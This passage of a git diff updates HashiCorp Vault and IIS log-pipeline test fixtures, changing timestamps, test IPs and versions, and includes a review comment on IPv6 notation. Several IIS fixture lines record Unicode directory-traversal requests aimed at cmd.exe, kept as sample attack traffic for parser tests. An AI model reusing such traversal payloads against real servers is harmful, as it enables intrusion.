isco_phone_csrc_token\":\"hmac-sha256:b2120f2e905e41167ea380586d9f1bb137728
73bb3e35aba28daca747921faad\",\"rest_notify_cisco_phone_password\":\"hmac-sha256:a4c3451df78d28825309c3b25fefb6fdb9314350da1169b012923325929d2b5d\",\"rest_notify_cisco_phone_username\":\"hmac-sha256:1229909bcdaa7acf6894ebfa51daff701b9f026f7bfff5525fe7ddfcf8469af6\",\"smtp_host\":\"hmac-sha256:bf4e6e6f4b1af3beb385006278b7e2da94eb4b243af8738727ba5e82375138c5\",\"smtp_password\":\"hmac-sha256:7b8a462d76578b0e4ddf162d9a244eb5a736d3d04b21d9ed399ad7f44032743e\",\"smtp_port\":587,\"smtp_username\":\"hmac-sha256:d97eb233a52d67e2fb16b43950b8537659b69a13e03aa58a771d8e82379354e4\",\"twilio_account_sid\":\"hmac-sha256:509150eeaf7657a069a37df450fe5821b307a882a2634230edf0b8b172f2fca8\",\"twilio_auth_token\":\"hmac-sha256:09cf3ffa023a5b5750d0aaff696f767b5a00c1af430b297abdc84d53dd4d139e\",\"cam_backyard_rtsp_url\":\"hmac-sha256:bcac97c20cdc641ca7ba4d1e4c80246961f6f116670ce6ae32be1a01be36fed1\",\"cam_backyard_url\":\"hmac-sha256:5a9348e779c7260e4375a734a4947506e97f86098e45db8d63ba800698d26c34\",\"cam_basement_door_rtsp_url\":\"hmac-sha256:ffd1f989ed0632e542f760ae8e683852e6d4b22acb24b5eae94e1568e977b007\",\"cam_basement_door_url\":\"hmac-sha256:550f62496448494a4a30a4c8499903ea58ea7ab43102a56103020c122795861b\",\"cam_driveway_rtsp_url\":\"hmac-sha256:7b732f13b417be1d8387dc9c517087cd2f9a854898f8bd50922ae39c9123cf5f\",\"cam_driveway_url\":\"hmac-sha256:aef04b9fc7c345e7cb49f3833fbe0d56c8d8c6c6d922152250019f83bfc38acc\",\"cam_front_door_rtsp_url\":\"hmac-sha256:db5ef5a052e6d09fee199dede89f5178afd5f642843268aa5bb43e755785f916\",\"cam_front_door_url\":\"hmac-sha256:6b5129afbd2e43f8ac8fe25a0b7c27f69c19d8713a95ac98ebfa65c8e51fd089\",\"cam_garage_rtsp_url\":\"hmac-sha256:10aa878ec26fdfa5e3a486ead013c693425f5c6bd3315b9365132a0c963c30f6\",\"cam_garage_url\":\"hmac-sha256:80d5c5b1080b12ed3681806bcc560f2ff0f53a43549df72396b14f41d1871dbf\",\"cam_mechanical_room_rtsp_url\":\"hmac-sha256:e343a772988cbc3262c6256df08c0c9f1a0f50e3bcefe3f39febc7cb135e2132\",\"cam_mechanical_room_url\":\"hmac-sha256:fd1f4
d286bebd86234c474580cc2a74fdb79b16d936e4b8562e5cc13d82fbf7b\",\"cam_os_password\":\"hmac-sha256:b428f7bdeb97348f2553143030dfb1ac3b714436b59ed74e3320af2e13b5919f\",\"cam_os_username\":\"hmac-sha256:ff23e0d8782523b6a57c1bc1d21f88ef451359d7acefb032864e7a2715ba4185\",\"yale_lock_code_andrew\":\"hmac-sha256:545bca27b7805c8f17433693e8a07dab5c8b9d07a9a0e99ba04d73917c882956\",\"yale_lock_code_neva\":\"hmac-sha256:954080fe6c36dddfecea03fe20c91fa75d1c54488c1c706c988650dd0c45647e\",\"zwave_network_key\":\"hmac-sha256:382cc81146b9b71dc62135d6fb97246c74818857f3a73b03e7f7367ea53a8336\"},\"metadata\":{\"created_time\":\"hmac-sha256:be77f81a3338087479da238bf04ab23998c11375bc830cdeca8e30c24ab8a095\",\"deletion_time\":\"hmac-sha256:17a84bc5c1c7ee851af0069663ab9de3c879107724470fa34fc0b5418fb653db\",\"destroyed\":false,\"version\":6}}}}", "kind": "event", "action": "read", diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json index eed7c1c11ea..266b1cdf818 100644 --- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json +++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-faked-all-fields.log-expected.json 
@@ -48,7 +48,7 @@
 "ip": "172.17.0.1"
 },
 "event": {
- "ingested": "2021-07-22T19:55:04.737199034Z",
+ "ingested": "2021-12-09T13:39:31.476462Z",
 "original": "{\"time\":\"2018-04-09T21:04:29.6406536Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"display_name\":\"token\",\"policies\":[\"default\",\"sudo\",\"surf-admin\"],\"metadata\":{\"loglevel\":\"raw\",\"remote\":\"false\",\"surf\":\"moderate\"},\"entity_id\":\"\"},\"request\":{\"id\":\"b2f72168-6cba-1bab-808a-72d9304b82f8\",\"operation\":\"read\",\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"client_token_accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"path\":\"auth/token/lookup-self\",\"data\":null,\"policy_override\":false,\"remote_address\":\"172.17.0.1\",\"wrap_ttl\":0,\"headers\":{}},\"error\":\"\"}",
 "kind": "event",
 "action": "read",
@@ -143,7 +143,7 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-07-22T19:55:04.737203036Z", + "ingested": "2021-12-09T13:39:31.476471Z", "original": "{\"time\":\"2018-04-09T21:04:29.6420203Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"display_name\":\"token\",\"policies\":[\"default\",\"sudo\",\"surf-admin\"],\"metadata\":{\"loglevel\":\"raw\",\"remote\":\"false\",\"surf\":\"moderate\"},\"entity_id\":\"\"},\"request\":{\"id\":\"b2f72168-6cba-1bab-808a-72d9304b82f8\",\"operation\":\"read\",\"client_token\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"client_token_accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"path\":\"auth/token/lookup-self\",\"data\":null,\"policy_override\":false,\"remote_address\":\"172.17.0.1\",\"wrap_ttl\":0,\"headers\":{}},\"response\":{\"data\":{\"accessor\":\"hmac-sha256:f5a8798113bb65c0676abb3eef5ca5482c0c7daac38da36d402282a5414fcf3d\",\"creation_time\":1523307682,\"creation_ttl\":180000000,\"display_name\":\"hmac-sha256:e38035c165f0076d9288ba0363eb36733379cc5d370bec5e82f11632519c26a8\",\"entity_id\":\"hmac-sha256:2fced7e2c77266f5079d733bea71dc8c8413d3838584ca9d0f4867271df7a220\",\"expire_time\":\"2023-12-23T05:01:22.8929692Z\",\"explicit_max_ttl\":0,\"id\":\"hmac-sha256:eb3da855a3fb8b1c3574064f7edd080a97c4ebcf4a8e6674126710915fe464ae\",\"issue_time\":\"2018-04-09T21:01:22.8929624Z\",\"meta\":{\"loglevel\":\"hmac-sha256:eac4a7deb2df94609ab14ae48b9edea81d91de51be1dd59df6ca6852537227c5\",\"remote\":\"hmac-sha256:aa2d1dd64d4468bbd9c6b0ca275cdffb7473a2d91b5f42a047161620245fcc79\",\"surf\":\"hmac-sha256:8b29af9294da23c72de8d8d847ccebd450d978af5565807d0c9922b6b2e92988\"},\"num_uses\":0,\"orphan\":false,\"path\":\"hmac-sha256:36ea987a227a2c7aefe055a98f99751383f601955e9f1925bd
3c2d6f9931a025\",\"policies\":[\"hmac-sha256:451623ebbe12fb9b1b3f444ceb5a5a46102452e46d640925c7b0dcb93a65a99a\",\"hmac-sha256:9a76c609b073848f2d9cb4a7fcddfc2103c0063480b87a9ee585e9e072e901d9\",\"hmac-sha256:8924f876eca967c68bbc8ac138e9f876f2144e300c08b1898224fc76902c1fe3\"],\"renewable\":true,\"ttl\":179999812}},\"error\":\"\"}", "kind": "event", "action": "read", @@ -233,7 +233,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-07-22T19:55:04.737204754Z", + "ingested": "2021-12-09T13:39:31.476476900Z", "original": "{\"time\":\"2021-07-21T12:37:50.93608Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"remaining_uses\":5,\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"request\":{\"id\":\"002c8225-e859-44a0-9ccb-471c3655dbd8\",\"operation\":\"update\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:e890f27c5ee11e26bda7c8e6ec218af451a6b1e35f9fe6d0676f1b29889b406c\",\"client_token_accessor\":\"35e2f256-0fc3-4eea-9405-3e212435b6c7\",\"namespace\":{\"id\":\"root\"},\"path\":\"secrets/foo\",\"data\":{\"data\":\"hmac-sha256:46c0fd3146d89ff602279417df7ac9267ce58fa3c6d2535d2d9050a5323c21ec\"},\"policy_override\":true,\"remote_address\":\"127.0.0.1\",\"wrap_ttl\":3600,\"headers\":{\"foo\":[\"bar\"]}},\"error\":\"this is an error\"}", "kind": "event", "action": "update", 
@@ -371,7 +371,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-07-22T19:55:04.737206429Z", + "ingested": "2021-12-09T13:39:31.476482600Z", "original": "{\"time\":\"2021-07-21T12:37:50.936443Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"remaining_uses\":5,\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"request\":{\"id\":\"002c8225-e859-44a0-9ccb-471c3655dbd8\",\"operation\":\"update\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:e890f27c5ee11e26bda7c8e6ec218af451a6b1e35f9fe6d0676f1b29889b406c\",\"client_token_accessor\":\"35e2f256-0fc3-4eea-9405-3e212435b6c7\",\"namespace\":{\"id\":\"root\"},\"path\":\"secrets/foo\",\"data\":{\"data\":\"hmac-sha256:46c0fd3146d89ff602279417df7ac9267ce58fa3c6d2535d2d9050a5323c21ec\"},\"policy_override\":true,\"remote_address\":\"127.0.0.1\",\"wrap_ttl\":3600,\"headers\":{\"foo\":[\"bar\"]}},\"response\":{\"auth\":{\"client_token\":\"hmac-sha256:3aae134b7843218bf089cd9b01a55ec417346a242b5383a7fac2ab49692f403a\",\"accessor\":\"bar\",\"display_name\":\"testtoken\",\"policies\":[\"root\"],\"token_policies\":[\"web\"],\"identity_policies\":[\"ident1\",\"ident2\"],\"external_namespace_policies\":{\"ns1\":[\"baz\"]},\"no_default_policy\":true,\"metadata\":{\"id\":\"007\"},\"entity_id\":\"foobarentity\",\"token_type\":\"service\",\"token_ttl\":14400,\"token_issue_time\":\"2020-05-28T13:40:18-05:00\"},\"mount_type\":\"kv\",\"data\":{\"certificate\":\"hmac-sha256:cb232c6394c9149b7f06f85e8ed9fcc55b7d1db82dd0ec1d321d0a83a7adda01\"},\"redirect\":\"redirect\",\"wrap_info\":{\"ttl\":3600,\"token\":\"hmac-sha
256:09dff0fdb8db56293383d7d0347afdf64ceb672cb9aea2c66edd802bcd714094\",\"accessor\":\"xzW2I9CMqcALsllhYvqtlsvq\",\"creation_time\":\"2020-05-28T18:40:18Z\",\"creation_path\":\"auth/token/create\",\"wrapped_accessor\":\"Bh57rT8zuhspG9APjXpGpiAJ\"},\"headers\":{\"Extra-Extra\":[\"read\"]}},\"error\":\"this is an error\"}", "kind": "event", "action": "update", diff --git a/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json b/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json index 6e935728165..f7e698bf375 100644 --- a/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json +++ b/packages/hashicorp_vault/data_stream/log/_dev/test/pipeline/test-log.log-expected.json @@ -16,7 +16,7 @@ "logger": "expiration" }, "event": { - "ingested": "2021-07-22T19:37:47.549316188Z", + "ingested": "2021-12-09T13:39:31.823398800Z", "kind": "event", "original": "{\"@level\":\"error\",\"@message\":\"failed to revoke lease\",\"@module\":\"expiration\",\"@timestamp\":\"2021-07-16T06:30:48.194192Z\",\"error\":\"failed to revoke entry: resp: (*logical.Response)(nil) err: RequestError: send request failed\\ncaused by: Post \\\"https://iam.amazonaws.com/\\\": dial tcp: lookup iam.amazonaws.com on 192.168.50.34:53: server misbehaving\",\"lease_id\":\"aws/creds/ddns-updater/oS5t84TSPRoYF2gX8McPyw4u\"}" }, @@ -40,7 +40,7 @@ "logger": "expiration" }, "event": { - "ingested": "2021-07-22T19:37:47.549319931Z", + "ingested": "2021-12-09T13:39:31.823409400Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"revoked lease\",\"@module\":\"expiration\",\"@timestamp\":\"2021-07-16T06:33:08.867457Z\",\"lease_id\":\"auth/token/create/nomad-cluster/h15d750323d62439265743da0f02537e763b1968ba586b27770bd5262c9891a47\"}" }, 
@@ -68,7 +68,7 @@ "logger": "core.cluster-listener" }, "event": { - "ingested": "2021-07-22T19:37:47.549321843Z", + "ingested": "2021-12-09T13:39:31.823413700Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"serving cluster requests\",\"@module\":\"core.cluster-listener\",\"@timestamp\":\"2021-07-09T17:20:27.184340Z\",\"cluster_listen_address\":{\"IP\":\"::\",\"Port\":8201,\"Zone\":\"\"}}" }, @@ -92,7 +92,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-07-22T19:37:47.549323663Z", + "ingested": "2021-12-09T13:39:31.823418500Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"creating Raft\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:20:27.190451Z\",\"config\":\"\\u0026raft.Config{ProtocolVersion:3, HeartbeatTimeout:5000000000, ElectionTimeout:5000000000, CommitTimeout:50000000, MaxAppendEntries:64, BatchApplyCh:false, ShutdownOnRemove:true, TrailingLogs:0x2800, SnapshotInterval:120000000000, SnapshotThreshold:0x2000, LeaderLeaseTimeout:2500000000, LocalID:\\\"compute03-example-com\\\", NotifyCh:(chan\\u003c- bool)(0x4000324070), LogOutput:io.Writer(nil), LogLevel:\\\"DEBUG\\\", Logger:(*hclog.interceptLogger)(0x400057f2f0), NoSnapshotRestoreOnStart:true, skipStartup:false}\"}" }, @@ -120,7 +120,7 @@ "logger": "core.cluster-listener.tcp" }, "event": { - "ingested": "2021-07-22T19:37:47.549325442Z", + "ingested": "2021-12-09T13:39:31.823424400Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"starting listener\",\"@module\":\"core.cluster-listener.tcp\",\"@timestamp\":\"2021-07-09T17:20:27.182327Z\",\"listener_address\":{\"IP\":\"0.0.0.0\",\"Port\":8201,\"Zone\":\"\"}}" }, 
@@ -145,7 +145,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-07-22T19:37:47.549327405Z", + "ingested": "2021-12-09T13:39:31.823430200Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"initial configuration\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:20:27.212828Z\",\"index\":7788,\"servers\":\"[{Suffrage:Voter ID:compute03-example-com Address:192.168.50.36:8201} {Suffrage:Voter ID:compute02-example-com Address:192.168.50.35:8201} {Suffrage:Voter ID:compute01-example-com Address:192.168.50.34:8201}]\"}" }, @@ -170,7 +170,7 @@ "logger": "storage.raft" }, "event": { - "ingested": "2021-07-22T19:37:47.549329215Z", + "ingested": "2021-12-09T13:39:31.823434300Z", "kind": "event", "original": "{\"@level\":\"warn\",\"@message\":\"failed to contact\",\"@module\":\"storage.raft\",\"@timestamp\":\"2021-07-09T17:04:06.945541Z\",\"server-id\":\"compute03-example-com\",\"time\":4959141198}" }, @@ -194,7 +194,7 @@ "logger": "core.raft" }, "event": { - "ingested": "2021-07-22T19:37:47.549331028Z", + "ingested": "2021-12-09T13:39:31.823438400Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"installed new raft TLS key\",\"@module\":\"core.raft\",\"@timestamp\":\"2021-07-16T19:05:02.795425Z\",\"term\":402}" }, @@ -219,7 +219,7 @@ "level": "info" }, "event": { - "ingested": "2021-07-22T19:37:47.549332843Z", + "ingested": "2021-12-09T13:39:31.823441900Z", "kind": "event", "original": "{\"@level\":\"info\",\"@message\":\"proxy environment\",\"@timestamp\":\"2021-07-09T17:01:42.203665Z\",\"http_proxy\":\"\",\"https_proxy\":\"\",\"no_proxy\":\"\"}" }, @@ -243,7 +243,7 @@ "logger": "audit" }, "event": { - "ingested": "2021-07-22T19:37:47.549334656Z", + "ingested": "2021-12-09T13:39:31.823446400Z", "kind": "event", "original": "{\"@level\":\"debug\",\"@message\":\"adding reload function\",\"@module\":\"audit\",\"@timestamp\":\"2021-07-22T17:33:20.689412Z\",\"path\":\"file/\"}" }, 
@@ -271,7 +271,7 @@
 "logger": "audit"
 },
 "event": {
- "ingested": "2021-07-22T19:37:47.549336472Z",
+ "ingested": "2021-12-09T13:39:31.823452200Z",
 "kind": "event",
 "original": "{\"@level\":\"debug\",\"@message\":\"file backend options\",\"@module\":\"audit\",\"@timestamp\":\"2021-07-22T17:33:20.689526Z\",\"file_path\":\"/vault/logs/audit.json\",\"path\":\"file/\"}"
 },
@@ -296,7 +296,7 @@
 "logger": "core"
 },
 "event": {
- "ingested": "2021-07-22T19:37:47.549338771Z",
+ "ingested": "2021-12-09T13:39:31.823458400Z",
 "kind": "event",
 "original": "{\"@level\":\"info\",\"@message\":\"enabled audit backend\",\"@module\":\"core\",\"@timestamp\":\"2021-07-22T17:33:20.691959Z\",\"path\":\"file/\",\"type\":\"file\"}"
 },
diff --git a/packages/hashicorp_vault/manifest.yml b/packages/hashicorp_vault/manifest.yml
index a8e206e004a..e156af8d443 100644
--- a/packages/hashicorp_vault/manifest.yml
+++ b/packages/hashicorp_vault/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: hashicorp_vault
 title: Hashicorp Vault
-version: 1.2.0
+version: 1.2.1
 license: basic
 description: Collect logs and metrics from Hashicorp Vault with Elastic Agent.
 type: integration
diff --git a/packages/iis/changelog.yml b/packages/iis/changelog.yml
index b081204c58e..3d9b232003e 100644
--- a/packages/iis/changelog.yml
+++ b/packages/iis/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.8.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "0.8.0"
 changes:
 - description: Support Kibana 8.0
diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json
index c18a42999d5..85808183cd4 100644
--- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json
+++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-72.log-expected.json @@ -46,7 +46,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:31.731260200Z", + "ingested": "2021-12-09T13:39:33.179061100Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..À¯..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 64 0", "kind": "event", "category": [ @@ -118,7 +118,7 @@ }, "event": { "duration": 46000000, - "ingested": "2021-06-09T11:14:31.731282500Z", + "ingested": "2021-12-09T13:39:33.179069800Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..ÁÁ..ÁÁ..ÁÁ..ÁÁ..ÁÁ../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 2 46", "kind": "event", "category": [ @@ -188,7 +188,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:31.731289600Z", + "ingested": "2021-12-09T13:39:33.179075800Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /Director - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -258,7 +258,7 @@ }, "event": { "duration": 0, - "ingested": "2021-06-09T11:14:31.731294600Z", + "ingested": "2021-12-09T13:39:33.179081600Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET / - 443 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 401 0 0 0", "kind": "event", "category": [ @@ -330,7 +330,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-06-09T11:14:31.731306700Z", + "ingested": "2021-12-09T13:39:33.179087400Z", "original": "2018-12-31 12:02:53 10.44.0.136 GET /pbserver/..Áœ..Áœ..Áœ..Áœ..Áœ../winnt/system32/cmd.exe /c+dir+c:\\+/OG 8080 - 10.50.6.188 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+Trident/4.0) - 404 0 64 15", "kind": "event", "category": [ 
diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log
index 4211680cb61..05c891905f0 100644
--- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log
+++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log
@@ -1,4 +1,4 @@
 2018-08-28 18:24:25 [10.100.220.70](http://10.100.220.70) GET / - 80 - [10.100.118.31](http://10.100.118.31) Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.3;+WOW64;+Trident/7.0;+.NET4.0E;+.NET4.0C;+.NET+CLR+3.5.30729;+.NET+CLR[+2.0.50727](tel:+2050727);+.NET+CLR+3.0.30729) 404 4 2 792
 2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15
 2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15
-2019-03-06 18:43:17 2001:cdba:0000:0000:0000:0000:3257:9652 GET /health-monitoring - 80 - 2001:cdba:0000:0000:0000:0000:3257:9652 - 200 0 0 15
+2019-03-06 18:43:17 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 GET /health-monitoring - 80 - 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 - 200 0 0 15
diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json
index b0c707e04a1..1a6cef5e3a7 100644
--- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json
+++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access-75.log-expected.json
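Review bot: The replaced line was the only input in this fixture written with zero-filled IPv6 hextets (`2001:cdba:0000:0000:0000:0000:3257:9652`), and its replacement `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` is already in short form, so the pipeline's handling of the expanded notation is no longer exercised here; the sibling test-ipv6zone fixture only covers `::1%0`. If that notation was deliberate coverage, the new address can stay in the supported subset and keep it by being written expanded in the input, `2a02:cf40:0add:4002:91f2:a9b2:e09a:6fc6`, assuming the expected `source.ip` then matches whatever normalisation the pipeline applies, which I cannot confirm from this hunk.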
@@ -44,7 +44,7 @@
 },
 "event": {
 "duration": 792000000,
- "ingested": "2021-06-09T11:14:31.949859100Z",
+ "ingested": "2021-12-09T13:39:34.018260800Z",
 "original": "2018-08-28 18:24:25 [10.100.220.70](http://10.100.220.70) GET / - 80 - [10.100.118.31](http://10.100.118.31) Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.3;+WOW64;+Trident/7.0;+.NET4.0E;+.NET4.0C;+.NET+CLR+3.5.30729;+.NET+CLR[+2.0.50727](tel:+2050727);+.NET+CLR+3.0.30729) 404 4 2 792",
 "kind": "event",
 "category": [
@@ -114,7 +114,7 @@
 },
 "event": {
 "duration": 15000000,
- "ingested": "2021-06-09T11:14:31.949903600Z",
+ "ingested": "2021-12-09T13:39:34.018269200Z",
 "original": "2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15",
 "kind": "event",
 "category": [
@@ -171,7 +171,7 @@
 },
 "event": {
 "duration": 15000000,
- "ingested": "2021-06-09T11:14:31.949909300Z",
+ "ingested": "2021-12-09T13:39:34.018275Z",
 "original": "2019-03-06 18:43:17 10.0.140.107 GET /health-monitoring - 80 - 10.0.140.2 - 200 0 0 15",
 "kind": "event",
 "category": [
@@ -188,12 +188,27 @@
 "temp": {},
 "destination": {
 "port": 80,
- "address": "2001:cdba:0000:0000:0000:0000:3257:9652",
- "ip": "2001:cdba:0000:0000:0000:0000:3257:9652"
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "source": {
- "address": "2001:cdba:0000:0000:0000:0000:3257:9652",
- "ip": "2001:cdba:0000:0000:0000:0000:3257:9652"
+ "geo": {
+ "continent_name": "Europe",
+ "country_name": "Denmark",
+ "location": {
+ "lon": 10.0,
+ "lat": 56.0
+ },
+ "country_iso_code": "DK"
+ },
+ "as": {
+ "number": 62121,
+ "organization": {
+ "name": "Christian Ebsen ApS"
+ }
+ },
+ "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
+ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 },
 "url": {
 "path": "/health-monitoring",
@@ -214,8 +229,8 @@
 },
 "related": {
 "ip": [
- "2001:cdba:0000:0000:0000:0000:3257:9652",
- "2001:cdba:0000:0000:0000:0000:3257:9652"
+ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
+ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6"
 ]
 },
 "http": {
@@ -228,8 +243,8 @@
 },
 "event": {
 "duration": 15000000,
- "ingested": "2021-06-09T11:14:31.949913800Z",
- "original": "2019-03-06 18:43:17 2001:cdba:0000:0000:0000:0000:3257:9652 GET /health-monitoring - 80 - 2001:cdba:0000:0000:0000:0000:3257:9652 - 200 0 0 15",
+ "ingested": "2021-12-09T13:39:34.018280500Z",
+ "original": "2019-03-06 18:43:17 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 GET /health-monitoring - 80 - 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 - 200 0 0 15",
 "kind": "event",
 "category": [
 "web",
diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log
index a2ce20afbf0..740365e42ce 100644
--- a/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log
+++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-iis-access.log
@@ -1,5 +1,5 @@ -2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 85.181.35.98 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123 +2018-01-01 08:09:10 127.0.0.1 GET / q=100 80 - 67.43.156.13 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - 200 0 0 123 2018-01-01 09:10:11 W3SVC1 GET / - 80 - 127.0.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:57.0)+Gecko/20100101+Firefox/57.0 - - example.com 200 0 0 123 456 789 -2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 85.181.35.98 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789 +2018-01-01 10:11:12 W3SVC1 MACHINE-NAME 127.0.0.1 GET / - 80 - 67.43.156.13 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36 - - example.com 200 0 0 123 456 789 2018-12-31 12:52:33 10.44.0.136 GET / 